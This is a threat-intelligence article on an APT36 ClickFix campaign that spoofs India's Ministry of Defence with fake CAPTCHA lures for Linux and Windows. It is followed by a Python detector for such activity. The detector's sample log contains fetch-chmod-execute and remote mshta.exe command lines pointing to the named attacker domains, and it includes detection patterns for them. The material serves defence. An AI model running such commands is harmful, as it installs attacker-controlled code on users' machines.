APT36 Expands ClickFix Technique for Linux Systems
Expanding the ClickFix campaign to target Linux systems, a new operation assessed to align with APT36 (aka Transparent Tribe) introduces cross-platform delivery techniques that now include Linux-based payloads, according to findings from Hunt.io. The activity centers on a phishing site that spoofs India's Ministry of Defence press release portal. Review of the cloned page's HTML source shows it was created with HTTrack on March 7, 2025, and is hosted on the domain email[.]gov[.]in.drdosurvey[.]info. The mirrored site displays monthly archives spanning September 2023 to April 2025, but only the March 2025 entry links to an active payload. The remainder of the content is static and non-functional, indicating either an early development stage or a narrowed targeting approach. The attribution of this campaign to APT36 is based on infrastructure choices, lure design, and the group's prior targeting history focused on Indian government and military interests.
The Linux-specific flow begins with a spoofed CAPTCHA page containing a button labeled "I'm not a rebot," which copies a shell command to the user's clipboard. If executed, this command downloads a shell script, "mapeal.sh," from the attacker-controlled domain trade4wealth[.]in, modifies permissions with "chmod +x," and runs the file. The page then redirects to a guide that walks the user through the manual execution process. While the payload currently lacks malicious functionality, Hunt.io notes: “As of this writing, the Linux payload (mapeal.sh) performs no observable malicious behavior,” suggesting the campaign may still be in development.
The Windows flow follows the established ClickFix approach. After the initial lure page, users encounter a full-screen "For Official Use Only" warning that camouflages a blurred government web portal. Once engaged, a JavaScript function silently places a command invoking "mshta.exe" with a remote HTA payload URL into the user's clipboard. This HTA file contains heavily obfuscated JavaScript and delivers a .NET-based loader that initiates outbound connections to attacker infrastructure, including a spoofed subdomain, email[.]gov[.]in.avtzyu[.]store. To mask the operation, a legitimate-looking press release document is displayed to the user. This flow mirrors earlier ClickFix executions, reinforcing campaign attribution and operational consistency.
Though the underlying techniques are not new, Hunt.io emphasizes the broader detection strategy: “For defenders, the takeaway isn't tied to a single technique—it’s the way familiar methods are being reused in slightly new combinations. Look for signs like clipboard-delivered commands, spoofed government subdomains, shallow clones of trusted sites, and payloads staged under common web folders.” This campaign illustrates how well-understood TTPs continue to evolve incrementally, with added flexibility across operating systems.
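The detection guidance above can be turned into a concrete check over command-line telemetry. The following is an added example written for this article, not code from Hunt.io: it scans constructed sample log lines for the two delivery chains described (a Linux one-liner that fetches a script, runs chmod +x and executes it; mshta.exe launched with a remote .hta URL) and for lookalike hostnames that embed a trusted government domain as a subdomain of an unrelated registrable domain. The hostnames in KNOWN_BAD_HOSTS are the defanged indicators from the article with brackets removed; the TRUSTED_SUFFIXES list, the log-line format (`... cmd=<command>`) and the sample lines are assumptions made for the example.

```python
"""Flag ClickFix-style indicators in process command-line logs.

Added illustrative example, not Hunt.io's code. The indicators follow the
article: clipboard-delivered one-liners (fetch, chmod +x, execute),
mshta.exe with a remote HTA URL, and spoofed government subdomains.
"""
import re

# Assumption for this example: domains whose labels an attacker might
# embed in a lookalike hostname (e.g. email.gov.in.<attacker-domain>).
TRUSTED_SUFFIXES = ("gov.in", "nic.in")

# Hostnames named in the article, with defanging brackets removed.
KNOWN_BAD_HOSTS = {
    "email.gov.in.drdosurvey.info",
    "email.gov.in.avtzyu.store",
    "trade4wealth.in",
}

# Command-line shapes for the two delivery chains the article describes.
PATTERNS = {
    # curl/wget <url> ... chmod +x ... ; ./something  (or bash/sh something)
    "linux_fetch_chmod_exec": re.compile(
        r"\b(curl|wget)\b.*?https?://\S+.*?\bchmod\s+\+x\b.*?(;|&&|\|\|)\s*(\./|bash\s|sh\s)",
        re.IGNORECASE,
    ),
    # mshta.exe https://.../payload.hta
    "mshta_remote_hta": re.compile(
        r"\bmshta(\.exe)?\b\s+[\"']?https?://\S+\.hta\b", re.IGNORECASE
    ),
}

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def lookalike_host(host: str) -> bool:
    """True if a trusted domain appears as a whole label sequence inside the
    hostname but is not the hostname's real registrable suffix.
    email.gov.in.drdosurvey.info -> True; mod.gov.in -> False."""
    host = host.lower().rstrip(".")
    if any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES):
        return False  # genuinely under the trusted domain
    return any(
        re.search(r"(^|\.)" + re.escape(s) + r"\.", host) for s in TRUSTED_SUFFIXES
    )


def analyze(cmdline: str) -> list:
    """Return the indicator names triggered by a single command line."""
    hits = [name for name, pat in PATTERNS.items() if pat.search(cmdline)]
    for host in URL_HOST.findall(cmdline):
        host = host.lower()
        if host in KNOWN_BAD_HOSTS:
            hits.append("known_bad_host:" + host)
        if lookalike_host(host):
            hits.append("lookalike_gov_host:" + host)
    return hits


def scan(lines: list) -> dict:
    """Run analyze() over log lines of the assumed form '... cmd=<command>'
    and return {line_index: indicators} for lines that triggered anything."""
    findings = {}
    for i, line in enumerate(lines):
        cmd = line.split("cmd=", 1)[1] if "cmd=" in line else line
        hits = analyze(cmd)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample telemetry: two lines in the shape of the article's
# Linux and Windows chains, followed by three benign lines.
SAMPLE_LOG = [
    "host=dev01 user=alice cmd=curl -s http://trade4wealth.in/mapeal.sh -o mapeal.sh; chmod +x mapeal.sh; ./mapeal.sh",
    "host=ws07 user=bob cmd=mshta.exe https://email.gov.in.avtzyu.store/press/index.hta",
    "host=dev01 user=alice cmd=curl -s https://pypi.org/simple/ -o index.html",
    "host=ws07 user=bob cmd=mshta.exe C:\\Windows\\System32\\local.hta",
    "host=dev02 user=carol cmd=chmod +x build.sh; ./build.sh",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
```

The lookalike check deliberately requires the trusted domain to appear as complete labels followed by a dot, so hosts that merely contain the string (xgov.in.example.com) are not flagged while email.gov.in.drdosurvey.info is; the two regexes are intentionally shape-based rather than tied to the file name mapeal.sh, since the article notes the payload itself is still changing.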